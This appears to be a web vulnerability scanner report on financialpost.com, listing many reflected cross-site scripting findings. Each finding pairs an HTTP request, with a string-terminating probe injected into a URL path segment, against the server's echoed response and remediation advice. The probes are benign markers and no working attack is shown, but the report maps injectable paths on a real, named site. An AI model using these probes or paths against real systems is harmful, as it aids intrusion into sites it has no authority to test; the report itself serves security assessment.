Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/sidebar/most-popular61041'%3bebbe0febebf/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:24 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43520
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba0cd'%3bffc5ac2518 was submitted in the REST URL parameter 4. This input was echoed as ba0cd';ffc5ac2518 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/sidebar/most-popular/ba0cd'%3bffc5ac2518 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:30 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43557
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc773'%3b3d124b5b04 was submitted in the REST URL parameter 1. This input was echoed as bc773';3d124b5b04 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsbc773'%3b3d124b5b04/account_s_code.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:17 GMT
Date: Sun, 19 Dec 2010 03:03:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42992
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f01f'%3b33001376b97 was submitted in the REST URL parameter 2. This input was echoed as 6f01f';33001376b97 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/6f01f'%3b33001376b97 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42957
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afcb6'%3b20b8654109d was submitted in the REST URL parameter 1. This input was echoed as afcb6';20b8654109d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsafcb6'%3b20b8654109d/local_s_code.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:20 GMT
Date: Sun, 19 Dec 2010 03:03:20 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42994
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3904a'%3b66e2a69e5b6 was submitted in the REST URL parameter 2. This input was echoed as 3904a';66e2a69e5b6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/3904a'%3b66e2a69e5b6 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:26 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 42957
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee474'%3b656ca213590 was submitted in the REST URL parameter 1. This input was echoed as ee474';656ca213590 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /magazineee474'%3b656ca213590/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43140
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799c0'%3b846cbcb660c was submitted in the REST URL parameter 1. This input was echoed as 799c0';846cbcb660c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets799c0'%3b846cbcb660c/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36302
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89cb2'%3ba2a4a97ee03 was submitted in the REST URL parameter 1. This input was echoed as 89cb2';a2a4a97ee03 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets89cb2'%3ba2a4a97ee03/company/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43332
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd9f6'%3b784d6ba2a9b was submitted in the REST URL parameter 2. This input was echoed as dd9f6';784d6ba2a9b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/companydd9f6'%3b784d6ba2a9b/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43296
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76a86'%3b18777c60d8e was submitted in the REST URL parameter 3. This input was echoed as 76a86';18777c60d8e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/company/76a86'%3b18777c60d8e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43339
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72b02'%3ba82f1c7067e was submitted in the REST URL parameter 1. This input was echoed as 72b02';a82f1c7067e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets72b02'%3ba82f1c7067e/company/news/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68964
Expires: Sun, 19 Dec 2010 02:58:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets72b02';a82f1c7067e/company/news/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets72b02';a82f1c7067e;kw=company;kw=news;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=19334656?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53308'%3bd98cf4b6041 was submitted in the REST URL parameter 2. This input was echoed as 53308';d98cf4b6041 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/company53308'%3bd98cf4b6041/news/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70239
Expires: Sun, 19 Dec 2010 02:58:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company53308';d98cf4b6041/news/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company53308';d98cf4b6041;kw=news;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68119831?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f73'%3bc39a440a891 was submitted in the REST URL parameter 3. This input was echoed as f6f73';c39a440a891 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/company/newsf6f73'%3bc39a440a891/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69677
Expires: Sun, 19 Dec 2010 02:58:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company/newsf6f73';c39a440a891/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company;kw=newsf6f73';c39a440a891;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=97628114?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ed45'%3be3d4058c973 was submitted in the REST URL parameter 4. This input was echoed as 8ed45';e3d4058c973 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/company/news/8ed45'%3be3d4058c973 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:59:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:59:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43481
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4081d'%3b37f4d0cacb4 was submitted in the REST URL parameter 1. This input was echoed as 4081d';37f4d0cacb4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets4081d'%3b37f4d0cacb4/currencies/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43392
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c598b'%3bb34dc10ee96 was submitted in the REST URL parameter 2. This input was echoed as c598b';b34dc10ee96 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/currenciesc598b'%3bb34dc10ee96/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43356
